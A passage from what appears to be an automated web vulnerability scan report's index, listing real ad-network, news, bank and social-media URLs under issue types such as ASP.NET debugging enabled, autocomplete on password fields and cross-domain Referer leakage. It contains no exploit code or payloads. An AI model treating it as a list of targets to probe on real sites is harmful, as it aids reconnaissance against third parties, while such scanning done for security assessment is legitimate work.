16.12. http://optout.mookie1.com/optout/nai/

16.13. http://pixel.adsafeprotected.com/jspix

16.14. http://search.spotxchange.com/vast/2.00/75606

16.15. http://shopping.indiatimes.com/ism/faces/tracker.jsp

16.16. http://tag.admeld.com/nai-opt-out

16.17. http://thestar.com.my/news/story.asp

16.18. http://tweetmeme.com/auth/login

16.19. http://twitterapi.indiatimes.com/feedtweet/tweet

16.20. http://www.amazon.com/

16.21. http://www.amazon.com/b

16.22. http://www.amazon.com/dp/0307387178

16.23. http://www.amazon.com/dp/B000QRIGLW

16.24. http://www.amazon.com/dp/B002Y27P3M

16.25. http://www.amazon.com/dp/B004DERF5M

16.26. http://www.godaddy.com/gdshop/ssl/ssl.asp

16.27. http://www.magicbricks.com/bricks/viewProperty.html

16.28. http://www.scb.co.th/scb_api/api_a_deposit.jsp

16.29. http://www.scb.co.th/scb_api/scbapi.jsp

16.30. http://www.simplymarry.com/timesmatri/faces/jsp/profileDisplay.jsp

16.31. http://www.simplymarry.com/timesmatri/faces/jsp/searchResult.photo

16.32. http://www.timesjobs.com/candidate/job-search.html

16.33. http://a.collective-media.net/optout

16.34. http://a.netmng.com/opt-out.php

16.35. http://a.rfihub.com/nai_opt_out_1.gif

16.36. http://a.tribalfusion.com/displayAd.js

16.37. http://a.tribalfusion.com/i.optout

16.38. http://a.tribalfusion.com/j.ad

16.39. http://a.tribalfusion.com/z/i.optout

16.40. http://ad.360yield.com/match

16.41. http://ad.afy11.net/ad

16.42. http://ad.turn.com/server/ads.js

16.43. http://ad.turn.com/server/pixel.htm

16.44. http://ad.yieldmanager.com/imp

16.45. http://ad.yieldmanager.com/pixel

16.46. http://admonkey.dapper.net/PixelMonkey

16.47. http://ads.amgdgt.com/ads/opt-out

16.48. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=589305873

16.49. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=696671320

16.50. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=1X1PIXELS/POSITION=BOTTOM1/METHOD=JSCRIPT/ACC_RANDOM=942539787

16.51. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=467401908

16.52. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=855445601

16.53. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=145153813

16.54. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=60942710

16.55. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=628335201

16.56. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=BUSINESS/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=692460860

16.57. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=120X90PIXELS/POSITION=TOP2/METHOD=JSCRIPT/ACC_RANDOM=44721460

16.58. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT1/METHOD=JSCRIPT/ACC_RANDOM=722121084

16.59. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT2/METHOD=JSCRIPT/ACC_RANDOM=34309588

16.60. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=300X250PIXELS/POSITION=RIGHT3/METHOD=JSCRIPT/ACC_RANDOM=509036560

16.61. http://ads.bangkokpost.co.th/jserver/SITE=BANGKOKPOST/AREA=HOMEPAGE/AAMSZ=728X90PIXELS/POSITION=CENTER/METHOD=JSCRIPT/ACC_RANDOM=820931449

16.62. http://ads.indiatimes.com/ads.dll/genptypead

16.63. http://ads.reach360ads.com/www/ads/ad_log.php

16.64. http://ads.reach360ads.com/www/ads/click.php

16.65. http://ads.reach360ads.com/www/ads/iframe.php

16.66. http://ads3.bangkokpost.co.th/www/delivery/spc.php

16.67. http://adssrv.nationmultimedia.com/adlog.php

16.68. http://adstil.indiatimes.com/RealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/13932048678/x32/OasDefault/3670000929000010THEADVER6209TOIR/Advert1x1Aug15/33323137376236613465363265316130

16.69. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

16.70. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

16.71. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

16.72. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

16.73. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

16.74. https://adwords.google.com/um/StartNewLogin

16.75. http://ak1.abmr.net/is/r1-ads.ace.advertising.com

16.76. http://api.aggregateknowledge.com/optout2

16.77. http://api.agkn.com/optout2

16.78. http://as.casalemedia.com/j

16.79. http://ats.tumri.net/ats/optout

16.80. http://avn.innity.com/view/3898/35480/0/1315103295564

16.81. http://b.scorecardresearch.com/b

16.82. http://b.scorecardresearch.com/p

16.83. http://bh.contextweb.com/bh/rtset

16.84. http://bid.openx.net/json

16.85. http://c7.zedo.com/img/bh.gif

16.86. http://cas.criteo.com/delivery/afr.php

16.87. http://cdn4.specificclick.net/optout.php

16.88. http://clk.atdmt.com/MRT/go/343014976/direct

16.89. http://clk.atdmt.com/goiframe/171946551/278612752/direct

16.90. http://clk.fetchback.com/serve/fb/click

16.91. http://cms.ad.yieldmanager.net/v1/cms

16.92. http://d.tradex.openx.com/afr.php

16.93. http://d.tradex.openx.com/ck.php

16.94. http://d.tradex.openx.com/lg.php

16.95. http://d7.zedo.com/OzoDB/cutils/R53_7/jsc/1302/egc.js

16.96. http://d7.zedo.com/OzoDB/cutils/R53_7/jsc/933/egc.js

16.97. http://d7.zedo.com/OzoDB/cutils/R53_7_5/jsc/767/egc.js

16.98. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js

16.99. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js

16.100. http://d7.zedo.com/bar/v16-504/d2/jsc/gl.js

16.101. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js

16.102. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js

16.103. http://d7.zedo.com/img/bh.gif

16.104. http://d7.zedo.com/utils/ecSet.js

16.105. http://d7.zedo.com/utils/ecSet.js

16.106. http://developers.facebook.com/plugins/

16.107. http://dis.sv.us.criteo.com/dis/dis.aspx

16.108. http://domdex.com/nai_optout.php

16.109. http://dp.33across.com/ps/

16.110. http://i.w55c.net/ping_match.gif

16.111. http://idcs.interclick.com/Segment.aspx

16.112. http://idiva.com/index.php

16.113. http://image2.pubmatic.com/AdServer/Pug

16.114. http://img.pulsemgr.com/optout

16.115. http://imp.fetchback.com/serve/fb/adtag.js

16.116. http://imp.fetchback.com/serve/fb/hover

16.117. http://imp.fetchback.com/serve/fb/imp

16.118. http://load.exelator.com/load/

16.119. http://load.exelator.com/load/

16.120. http://load.exelator.com/load/OptOut.php

16.121. http://lvs.truehits.in.th/goggen.php

16.122. http://nai.btrll.com/nai/optout

16.123. http://netspiderads2.indiatimes.com/ads.dll/getad

16.124. http://netspiderads2.indiatimes.com/ads.dll/getxmlad

16.125. http://notrack.adviva.net/CookieCheck.php

16.126. http://notrack.specificclick.net/CookieCheck.php

16.127. http://notrack.specificmedia.com/CookieCheck.php

16.128. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle

16.129. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top

16.130. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1442444284@Top

16.131. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96

16.132. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top

16.133. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96

16.134. http://oo.afy11.net/NAIOptOut.aspx

16.135. http://optimized-by.rubiconproject.com/a/4642/5271/7551-15.js

16.136. http://optout.33across.com/api/

16.137. http://optout.adlegend.com/nai/optout.php

16.138. http://optout.crwdcntrl.net/optout

16.139. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

16.140. http://optout.imiclk.com/cgi/optout.cgi

16.141. http://optout.mookie1.decdna.net/optout/nai/

16.142. http://optout.mookie1.decideinteractive.com/optout/nai/

16.143. http://optout.mookie1.pm14.com/optout/nai/

16.144. http://optout.mxptint.net/naioptout.ashx

16.145. http://optout.xgraph.net/optout.gif.jsp

16.146. http://p.brilig.com/contact/optout

16.147. http://pbid.pro-market.net/engine

16.148. http://phoenix.untd.com/TRCK/RGST

16.149. http://pixel.33across.com/ps/

16.150. http://pixel.adblade.com/imps.php

16.151. http://pixel.fetchback.com/serve/fb/optout

16.152. http://pixel.quantserve.com/optout_set

16.153. http://pixel.rubiconproject.com/tap.php

16.154. http://pixel.rubiconproject.com/tap.php

16.155. http://pixel.rubiconproject.com/tap.php

16.156. http://pixel.rubiconproject.com/tap.php

16.157. http://pixel.rubiconproject.com/tap.php

16.158. http://pixel.traveladvertising.com/Live/Pixel.aspx

16.159. http://plg3.yumenetworks.com/dynamic_preroll_playlist.vast2xml

16.160. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s82023671451024

16.161. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s85326054897159

16.162. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064

16.163. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s8630611889064

16.164. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88864460214972

16.165. http://premiumtv.122.2o7.net/b/ss/premiumtveplayerUS/0/FAS-3.1.2-AS3/s88942754534073

16.166. http://privacy.revsci.net/optout/optout.aspx

16.167. http://profile.live.com/badge

16.168. http://property.ndtv.com/ndtv_redirect.php

16.169. http://px.owneriq.net/naioptout

16.170. http://r.casalemedia.com/rum

16.171. http://r.openx.net/set

16.172. http://r.pixel.trafficmp.com/a/bpix

16.173. http://r.turn.com/r/bd

16.174. http://r.turn.com/r/beacon

16.175. http://r1-ads.ace.advertising.com/click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700%5E999589%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64

16.176. http://r1-ads.ace.advertising.com/click/site=0000800700/mnum=0000999589/cstr=88962478=_4e62e208,7215437176,800700^999589^1183^0,1_/xsxdata=$xsxdata/bnum=88962478/optn=64

16.177. http://r1-ads.ace.advertising.com/ctst=1/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

16.178. http://r1-ads.ace.advertising.com/site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

16.179. http://r1-ads.ace.advertising.com/site=804611/size=300250/u=2/bnum=36466465/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

16.180. http://rp.gwallet.com/r1/optout

16.181. http://rs.gwallet.com/r1/pixel/x420r5261063

16.182. http://rs.gwallet.com/r1/pixel/x420r9614074

16.183. http://s.amazon-cornerstone.com/iu3

16.184. http://s.xp1.ru4.com/coop

16.185. http://search.spotxchange.com/partner

16.186. http://srv.clickfuse.com/pixels/create.php

16.187. http://sync.mathtag.com/sync/img

16.188. http://t.mookie1.com/t/v1/event

16.189. http://t4.liverail.com/

16.190. http://tag.admeld.com/nai-status

16.191. http://tag.admeld.com/nai-test-opt-out

16.192. http://tags.bluekai.com/site/2688

16.193. http://tags.bluekai.com/site/353

16.194. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

16.195. http://timeslog.indiatimes.com/timeslog.dll/topcnt

16.196. http://trk.tidaltv.com/ILogger.aspx

16.197. http://uav.tidaltv.com/3PDPHandler.aspx

16.198. http://unitus.synergy-e.com/www/delivery/ajs.php

16.199. http://unitus.synergy-e.com/www/delivery/ck.php

16.200. http://unitus.synergy-e.com/www/delivery/lg.php

16.201. http://unitus.synergy-e.com/www/delivery/spc.php

16.202. http://web.adblade.com/impsc.php

16.203. http://www.adadvisor.net/nai/optout

16.204. http://www.adbrite.com/mb/nai_optout.php

16.205. http://www.addthis.com/api/nai/optout

16.206. http://www.bangkokpost.com/

16.207. http://www.bizographics.com/nai/optout

16.208. http://www.burstnet.com/cgi-bin/opt_out.cgi

16.209. http://www.emirates.com/us/english/index.aspx

16.210. http://www.facebook.com/pages/Friends-of-The-Nation/147232991936

16.211. http://www.google.com/reader/view/

16.212. http://www.mediaplex.com/optout_pure.php

16.213. http://www.mediaplex.com/optout_pure.php

16.214. http://www.nexac.com/nai_optout.php

16.215. http://www.wtp101.com/casale_sync

16.216. http://www.wtp101.com/pull_sync

16.217. http://www.youtube.com/results

16.218. http://www.youtube.com/watch

16.219. http://www.ztsystems.com/Default.aspx

16.220. http://www9.effectivemeasure.net/v4/em_dimg

16.221. http://www9.effectivemeasure.net/v4/em_js

17. Password field with autocomplete enabled

17.1. http://member.bangkokpost.com/login.php

17.2. http://ndtvjobs.bixee.com/search/search/

17.3. http://truehits.net/stat.php

17.4. http://twitter.com/

17.5. http://twitter.com/

17.6. http://twitter.com/

17.7. http://twitter.com/search

17.8. https://www.google.com/accounts/ServiceLogin

18. Source code disclosure

19. ASP.NET debugging enabled

19.1. http://ads.indiatimes.com/Default.aspx

19.2. http://tidaltv.com/Default.aspx

19.3. http://www.modestogov.com/Default.aspx

19.4. http://www.newspaperdirect.com/Default.aspx

19.5. http://www.tidaltv.com/Default.aspx

20. Referer-dependent response

20.1. http://a.collective-media.net/optout

20.2. http://ads.amgdgt.com/ads/opt-out

20.3. http://ats.tumri.net/ats/optout

20.4. http://d.tradex.openx.com/afr.php

20.5. http://optout.collective-media.net/optout/status

20.6. http://pixel.adsafeprotected.com/jspix

20.7. http://timeslog.indiatimes.com/timeslog.dll/topcnt

20.8. http://www.connect.facebook.com/widgets/fan.php

20.9. http://www.facebook.com/plugins/like.php

21. Cross-domain Referer leakage

21.1. http://223.165.24.159/toiwidget/jsp/widget.jsp

21.2. http://a1.interclick.com/CookieCheck.aspx

21.3. http://a1.interclick.com/optOut.aspx

21.4. http://ad-apac.doubleclick.net/adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2

21.5. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.250

21.6. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.306

21.7. http://ad.yieldmanager.com/pixel

21.8. http://ads.bluelithium.com/st

21.9. http://ads.reach360ads.com/www/ads/iframe.php

21.10. http://adserver.adtechus.com/addyn/3.0/5132/1305477/0/170/ADTECH

21.11. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

21.12. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

21.13. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

21.14. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

21.15. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

21.16. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

21.17. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_TOPICS/index.html/1982094345@Right1

21.18. http://advertising.aol.com/nai/nai.php

21.19. http://advertising.aol.com/nai/nai.php

21.20. http://advertising.aol.com/nai/nai.php

21.21. http://api.tweetmeme.com/v2/follow.js

21.22. http://as.casalemedia.com/j

21.23. http://as.casalemedia.com/j

21.24. http://as.serving-sys.com/OptOut/nai_optout.aspx

21.25. http://as.serving-sys.com/OptOut/nai_optout_results.aspx

21.26. http://as.serving-sys.com/OptOut/nai_optout_results.aspx

21.27. http://cas.criteo.com/delivery/afr.php

21.28. http://cdn.ndtv.com/static/js/jquery_tool_min-1.1.2.js

21.29. http://choice.atdmt.com/AdvertisementChoice/opt.out

21.30. http://choice.atdmt.com/AdvertisementChoice/opt.out

21.31. http://choice.atdmt.com/AdvertisementChoice/opt.out

21.32. http://choice.bing.com/AdvertisementChoice/opt.out

21.33. http://choice.bing.com/AdvertisementChoice/opt.out

21.34. http://choice.bing.com/AdvertisementChoice/opt.out

21.35. http://choice.live.com/AdvertisementChoice/opt.out

21.36. http://choice.live.com/AdvertisementChoice/opt.out

21.37. http://choice.live.com/AdvertisementChoice/opt.out

21.38. http://choice.live.com/AdvertisementChoice/opt.out

21.39. http://choice.microsoft.com/AdvertisementChoice/opt.out

21.40. http://choice.microsoft.com/AdvertisementChoice/opt.out

21.41. http://choice.microsoft.com/AdvertisementChoice/opt.out

21.42. http://choice.msn.com/AdvertisementChoice/opt.out

21.43. http://choice.msn.com/AdvertisementChoice/opt.out

21.44. http://choice.msn.com/AdvertisementChoice/opt.out

21.45. http://choice.msn.com/AdvertisementChoice/opt.out

21.46. http://cm.g.doubleclick.net/pixel

21.47. http://cm.g.doubleclick.net/pixel

21.48. http://cms.ad.yieldmanager.net/v1/cms

21.49. http://core.videoegg.com/eap/14533/html/jstags.html

21.50. http://core.videoegg.com/eap/latest/html/jstags.html

21.51. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js

21.52. http://dis.criteo.com/dis/optoutstatus.aspx

21.53. http://dis.criteo.com/dis/optoutstatus.aspx

21.54. http://edge.aperture.displaymarketplace.com/anotnai.gif

21.55. http://edge.aperture.displaymarketplace.com/anotnaistat.gif

21.56. http://edge.aperture.displaymarketplace.com/anotnaistat.gif

21.57. http://feed.mikle.com/feeds/rssmikle.cgi

21.58. http://googleads.g.doubleclick.net/pagead/ads

21.59. http://googleads.g.doubleclick.net/pagead/ads

21.60. http://googleads.g.doubleclick.net/pagead/ads

21.61. http://googleads.g.doubleclick.net/pagead/ads

21.62. http://ib.adnxs.com/ab

21.63. http://img.pulsemgr.com/optout

21.64. http://img.pulsemgr.com/optout

21.65. http://img.pulsemgr.com/optout

21.66. http://imp.fetchback.com/serve/fb/imp

21.67. http://info.yahoo.com/nai/nai-status.html

21.68. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr

21.69. http://media.fastclick.net/nai/remove

21.70. http://media.fastclick.net/nai/verify

21.71. http://netspiderads2.indiatimes.com/ads.dll/getad

21.72. http://netspiderads2.indiatimes.com/ads.dll/getad

21.73. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle

21.74. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@x96

21.75. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@x96

21.76. http://oo.afy11.net/NAIIsOptOut.aspx

21.77. http://oo.afy11.net/NAIIsOptOut.aspx

21.78. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

21.79. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

21.80. http://optout.doubleclick.net/cgi-bin/dclk/optoutnai.pl

21.81. http://optout.ib-ibi.com:8000/VerifyCookieStatus.aspx

21.82. http://optout.mxptint.net/naistatus.ashx

21.83. http://r1-ads.ace.advertising.com/site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

21.84. http://rcm.amazon.com/e/cm

21.85. http://rcm.amazon.com/e/cm

21.86. http://rcm.amazon.com/e/cm

21.87. http://rcm.amazon.com/e/cm

21.88. http://rcm.amazon.com/e/cm

21.89. http://rcm.amazon.com/e/cm

21.90. http://social.ndtv.com/static/Comment/Form/

21.91. http://tag.admeld.com/nai-status

21.92. http://tag.admeld.com/nai-status

21.93. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html

21.94. http://timesofindia.indiatimes.com/newtoolbar/9855193.cms

21.95. http://timesofindia.indiatimes.com/toitopics_callbybing.cms

21.96. http://timesofindia.indiatimes.com/toitopics_callbybing.cms

21.97. http://timesofindia.indiatimes.com/toitopics_googleads.cms

21.98. http://uav.tidaltv.com/3PDPHandler.aspx

21.99. http://uav.tidaltv.com/3PDPHandler.aspx

21.100. http://web.adblade.com/impsc.php

21.101. http://www.connect.facebook.com/widgets/fan.php

21.102. http://www.facebook.com/plugins/recommendations.php

21.103. http://www.google.com/cse

21.104. http://www.google.com/search

21.105. http://www.google.com/url

21.106. http://www.google.com/url

21.107. http://www.google.com/url

21.108. http://www.mathtag.com/cgi-bin/optout

21.109. http://www.mathtag.com/cgi-bin/optout

21.110. http://www.networkadvertising.org/yahoo_handler

21.111. http://www.pulse360.com/behavior/nai-opt-out.html

21.112. http://www.pulse360.com/behavior/nai-opt-out.html

21.113. http://www.tidaltv.com/optout/status.ashx

21.114. http://www.tidaltv.com/optout/verfiyoptout.ashx

21.115. http://www.tribalfusion.com/optout/verify.js

22. Cross-domain script include

22.1. http://ad-apac.doubleclick.net/adi/N5840.139243.NATIONMULTIMEDIA.CO/B4833719.2

22.2. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.250

22.3. http://ad.doubleclick.net/adi/N6296.126265.CASALE/B5641720.306

22.4. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

22.5. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top

22.6. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

22.7. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1324821476@Top

22.8. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

22.9. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1679277654@Right1

22.10. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1801219238@Right2

22.11. https://asia.citi.com/india/rca/send_money_to_india.htm

22.12. http://core.videoegg.com/eap/14533/html/jstags.html

22.13. http://core.videoegg.com/eap/latest/html/jstags.html

22.14. http://cps.regis.edu/lp/computer_degree/it_degree.php

22.15. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js

22.16. http://googleads.g.doubleclick.net/pagead/ads

22.17. http://hits.truehits.in.th/data/c0002761.js

22.18. http://idiva.com/index.php

22.19. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr

22.20. http://media1.bangkokpost.com/ads/Innity/030911TourismMalaysia728x90.html

22.21. http://member.bangkokpost.com/login.php

22.22. http://ndtvjobs.bixee.com/search/search/

22.23. http://netspiderads2.indiatimes.com/ads.dll/getad

22.24. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/martinimediainc.com/passback/1937148775@Middle

22.25. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1343751177@Top

22.26. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1886024182@Top

22.27. http://oasc12.247realmedia.com/RealMedia/ads/adstream_jx.ads/ndtv.com/ROS/1995720457@Top

22.28. http://r1-ads.ace.advertising.com/site=800700/size=300250/u=2/bnum=88962478/hr=21/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftimesofindia.indiatimes.com%252Fcity%252Fmumbai%252FMy-friend-Ganesha%252Farticleshow%252F9855193.cms

22.29. http://social.ndtv.com/NDTVProfit

22.30. http://social.ndtv.com/groups.php

22.31. http://social.ndtv.com/home.php

22.32. http://social.ndtv.com/static/Comment/Form/

22.33. http://social.ndtv.com/tbModel/signin.php

22.34. http://thestar.com.my/news/story.asp

22.35. http://tidaltv.com/

22.36. http://tidaltv.com/PrivacyDashboard.aspx

22.37. http://tidaltv.com/aboutus_who.html

22.38. http://tidaltv.com/optoutconfirm.html

22.39. http://tidaltv.com/publisher_overview.html

22.40. http://tidaltv.com/technology_overview.html

22.41. http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms

22.42. http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms

22.43. http://timesofindia.indiatimes.com/configspace/ads/TOI_mumbai_articlelist_36950_TOP.html

22.44. http://timesofindia.indiatimes.com/configspace/ads/googleadsarticlelistbot.html

22.45. http://timesofindia.indiatimes.com/configspace/ads/googleshowbtm.html

22.46. http://timesofindia.indiatimes.com/configspace/ads/googleshowtop.html

22.47. http://timesofindia.indiatimes.com/newtoolbar/9855193.cms

22.48. http://timesofindia.indiatimes.com/sponseredlinksros.cms

22.49. http://timesofindia.indiatimes.com/toifanapp.cms

22.50. http://timesofindia.indiatimes.com/toitopics_googleads.cms

22.51. http://timesofindia.indiatimes.com/topic/Xss

22.52. http://twitter.com/search

22.53. http://web.adblade.com/impsc.php

22.54. http://www.addthis.com/bookmark.php

22.55. http://www.amazon.com/

22.56. http://www.amazon.com/dp/B002Y27P3M

22.57. http://www.asianewsnet.net/climate/detail.php

22.58. http://www.asianewsnet.net/home/

22.59. http://www.asianewsnet.net/home/epaper.php

22.60. http://www.asianewsnet.net/home/highlight.php

22.61. http://www.asianewsnet.net/home/news.php

22.62. http://www.asianewsnet.net/home/video.php

22.63. http://www.bangkokpost.com/

22.64. http://www.bangkokpost.com/ads/google_adsense_728x90.html

22.65. http://www.bangkokpost.com/blogs/index.php/2011/08/30/small-parties-can-always-win-at-a-stretc

22.66. http://www.bangkokpost.com/blogs/index.php/2011/08/31/transparency-call-for-new-women-s-fund

22.67. http://www.bangkokpost.com/blogs/index.php/2011/09/02/in-venice-madonna-and-her-movie

22.68. http://www.bangkokpost.com/blogs/index.php/2011/09/03/in-venice-jung-freud-and-the-glory-of-pr

22.69. http://www.bangkokpost.com/business/

22.70. http://www.bangkokpost.com/business/telecom

22.71. http://www.bangkokpost.com/classified/viewforum.php

22.72. http://www.bangkokpost.com/forum/search.php

22.73. http://www.bangkokpost.com/forum/viewforum.php

22.74. http://www.bangkokpost.com/forum/viewtopic.php

22.75. http://www.bangkokpost.com/search/news-and-article

22.76. http://www.connect.facebook.com/widgets/fan.php

22.77. http://www.connect.facebook.com/widgets/fan.php

22.78. http://www.dnaindia.com/

22.79. http://www.dnaindia.com/redirect

22.80. http://www.dnaindia.com/sport/report_rain-plays-spoilsport-first-odi-abandoned_1582791

22.81. http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811

22.82. http://www.dnaindia.com/world

22.83. http://www.egnyte.com/corp/lp1/FTP-site-2.html

